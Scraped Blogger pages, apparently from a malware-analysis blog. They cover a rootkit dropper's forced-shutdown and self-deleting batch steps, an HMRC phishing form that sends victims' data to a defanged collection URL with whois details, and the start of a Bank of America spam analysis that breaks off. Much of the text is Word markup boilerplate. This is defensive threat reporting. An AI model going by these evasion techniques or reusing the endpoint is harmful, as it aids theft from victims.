<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;">
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
shutdown file, as its name implies, is a small executable created and activated
by the dropper. Its specific purpose: to forcefully shutdown the system. This
will execute the malicious modified partition and thus load the rootkit driver.</span></div>
</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdNQcyDQtIpSZN9qSeicqtwMBon_Yzv_KRZwD98m0zM8SU1kKkEgs2Z256DVXEgJAUSHF4UK5MyS8t8Yd3mlWvpjs9s-VqRFR0eEZHu31ayym_zEfu7E4WNpR_rrpaW8SVbF8T2oga-A/s1600/shutdownCODE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdNQcyDQtIpSZN9qSeicqtwMBon_Yzv_KRZwD98m0zM8SU1kKkEgs2Z256DVXEgJAUSHF4UK5MyS8t8Yd3mlWvpjs9s-VqRFR0eEZHu31ayym_zEfu7E4WNpR_rrpaW8SVbF8T2oga-A/s320/shutdownCODE.jpg" width="320" /></a></div>
<div style="text-align: left;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"></span></span></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: left;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></span><i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"></span></span></i></div>
<div style="text-align: left;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></span><i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"></span></span></i></div>
<div style="text-align: left;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></span><i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"></span></span></i></div>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">ATTRIBUTE MODIFIER</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">A
small batch file with a randomly generated name is created and called at the
end part of the dropper file. Its purpose is to delete the dropper and delete
itself to remove possible detection.</span></div>
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]--><br />
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"></span></span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiraUiYEt8-tTBPxwHH9FZMvrB416J0FhnP5Fl60-_k3l8VgFvOi4bNxvDAxwucj61Y4JABAjvflE6_OOTg3uYuSxoHZGWubzTo2XKjcHgPwrxeaPvzFaOThvRyOfeEYO1D8YDimlnuW5c/s1600/attrib.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiraUiYEt8-tTBPxwHH9FZMvrB416J0FhnP5Fl60-_k3l8VgFvOi4bNxvDAxwucj61Y4JABAjvflE6_OOTg3uYuSxoHZGWubzTo2XKjcHgPwrxeaPvzFaOThvRyOfeEYO1D8YDimlnuW5c/s320/attrib.jpg" width="320" /></a></div>
<div style="text-align: left;">
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></i><i><span style="font-family: Times,"Times New Roman",serif;"></span><span style="font-family: Times,"Times New Roman",serif;"></span></i></div>
</div>
Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-20859084282034662132013-08-28T02:41:00.003-07:002013-08-28T03:02:47.637-07:00Phishing targets HM Revenue & Customs clientsA new phishing targets HM Revenue & Customs clients. HM Revenue & Customs is an institution tied with the UK government responsible for UK's tax.
<br />
<br />
The phishing email contains these:
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_3L04Rpw_-2AWeyLiYyMJt-_uxGkf2Z3GtjBd1hd27hdxQdv0ErSdDI1FvsCGoYKhxiF1VpcdU_1Kw7YYhFgn1xtaeqD0jlZ6M3ZM_L-kC5tvQQK8LOCKw8KEjG-yhy9xwzJL5JQLDn6/s1600/email.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_3L04Rpw_-2AWeyLiYyMJt-_uxGkf2Z3GtjBd1hd27hdxQdv0ErSdDI1FvsCGoYKhxiF1VpcdU_1Kw7YYhFgn1xtaeqD0jlZ6M3ZM_L-kC5tvQQK8LOCKw8KEjG-yhy9xwzJL5JQLDn6/s1600/email.png" /></a>
<br />
<br />
With a zip archive attachment that contains an HTML file named <b>HM Revenue & Customs - Details.html</b>.
<br />
<br />
Once the html file is opened, it shows this form:
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkM0W4ohzUiwxx5JFCvSpgihVouLVabLqSjclU0qgBNTxBDgpaxsAQ1-eZH9Y1tvxseLuXFYZ0XCnBOehSzEY-pwLRmRAJLvfbEinnFDovjoM7EYPK8dwtJtsO6WI_Xdg9cSQ3W-igq3fU/s1600/form.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkM0W4ohzUiwxx5JFCvSpgihVouLVabLqSjclU0qgBNTxBDgpaxsAQ1-eZH9Y1tvxseLuXFYZ0XCnBOehSzEY-pwLRmRAJLvfbEinnFDovjoM7EYPK8dwtJtsO6WI_Xdg9cSQ3W-igq3fU/s1600/form.png" /></a>
<br />
<br />
The form looks legit since it uses images directly from the HMRC website.
<br />
<br />
When submitted, every information entered are sent to <pre class="brush:plain">h00p://nagios.net1.com.kh/nagiosweb/Lang.php</pre>
<br />
<br />
At the time of this writing, directing to the site where the information is sent to was probably shot down and now returns a 404.
<br />
<br />
A simple whois query about the server shows:
<br />
<br />
<pre class="brush:plain">
domain: nagios.net1.com.kh
current ip: 202.131.87.67
nameserver: ns1.cambotech.com
nameserver: ns2.cambotech.com
reverse lookup domains based on ip:
nagios.net1.com.kh
crm.netone.com.kh
</pre>
<br />
Located in Cambodia.
<br />
<br />
Nothing malware file was downloaded. Everything was plain and simple phishing and stealing.
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-68577023062017099052013-08-15T19:45:00.001-07:002013-08-16T03:24:18.177-07:00Bank of America spam: An Analysis<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMTkQLzufOKTJkTEnlf6KqAfh2zIbnHOSdmeRfmeQ6NLSNTn-7g_ZO-kDAPSe6EyuqhU9112P3pHoDbyd7c8lY_dAilmUPRqX05G0P3QOvNAkGxaEJxp8xaE_XmVCPlij3ebk06A4ukJo0/s1600/imageedit_1_5408479753.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMTkQLzufOKTJkTEnlf6KqAfh2zIbnHOSdmeRfmeQ6NLSNTn-7g_ZO-kDAPSe6EyuqhU9112P3pHoDbyd7c8lY_dAilmUPRqX05G0P3QOvNAkGxaEJxp8xaE_XmVCPlij3ebk06A4ukJo0/s1600/imageedit_1_5408479753.jpg" /></a></div>
An email claiming to be from Bank of America lures users to open an attachment that shows how to open secure emails from the bank. The message states it is a security measure when transmitting confidential information.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpq_O9d3YEPHnlyN4swBmvEj0-hilxsVHXfGWlY-tRHXF7-g-4LQN3lQEvu5lxsO5SfhauWgEWRdGdJKf5dlOMNCfyZcpFChQpiK53flS6UFs6OKSB29oJ9kQwFLrGGX1_w1lb-IygJUte/s1600/sample+email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpq_O9d3YEPHnlyN4swBmvEj0-hilxsVHXfGWlY-tRHXF7-g-4LQN3lQEvu5lxsO5SfhauWgEWRdGdJKf5dlOMNCfyZcpFChQpiK53flS6UFs6OKSB29oJ9kQwFLrGGX1_w1lb-IygJUte/s640/sample+email.png" /></a></div>
<br />
<br />
The message contains an attachment: a zip archive file <b>Instructions Secured E-mail.zip</b> that contains an executable file <b>Instructions Secured E-mail.exe</b> that has its icon mimicked that of Adobe PDF files.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFOg9HeRyYjE73Lr0FcZ6-5MBb3Ebkxc3ogXtZhUp13bwYEv2Q6x9RX0WY2ikAtttLBsTja4I5V14RWJ7xNmoiLHCzdlJdo1WB918KBD7zqy57p8yTUyOi5Sd2Mcb6-XuzvliVtuwZlpVB/s1600/icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFOg9HeRyYjE73Lr0FcZ6-5MBb3Ebkxc3ogXtZhUp13bwYEv2Q6x9RX0WY2ikAtttLBsTja4I5V14RWJ7xNmoiLHCzdlJdo1WB918KBD7zqy57p8yTUyOi5Sd2Mcb6-XuzvliVtuwZlpVB/s1600/icon.png" /></a></div>
<br />
<br />
Notable details about the file shows no program name nor company name.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvck9nEHodnCkUr_MNr2XlkCPeyWIHYptU-FmgHskKP5seI8v8NYcgAtZ9HRD51iyxaNsF3zV-gRDT9xsQoGTIV5gxCnDUjvjsND-srR_wjeI6z_SCPpdlnI4Dk4_yYg-g1TEOW3D1B1WD/s1600/file+details.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvck9nEHodnCkUr_MNr2XlkCPeyWIHYptU-FmgHskKP5seI8v8NYcgAtZ9HRD51iyxaNsF3zV-gRDT9xsQoGTIV5gxCnDUjvjsND-srR_wjeI6z_SCPpdlnI4Dk4_yYg-g1TEOW3D1B1WD/s1600/file+details.png" /></a></div>
<br />
<br />
<b>The Technical Part</b>
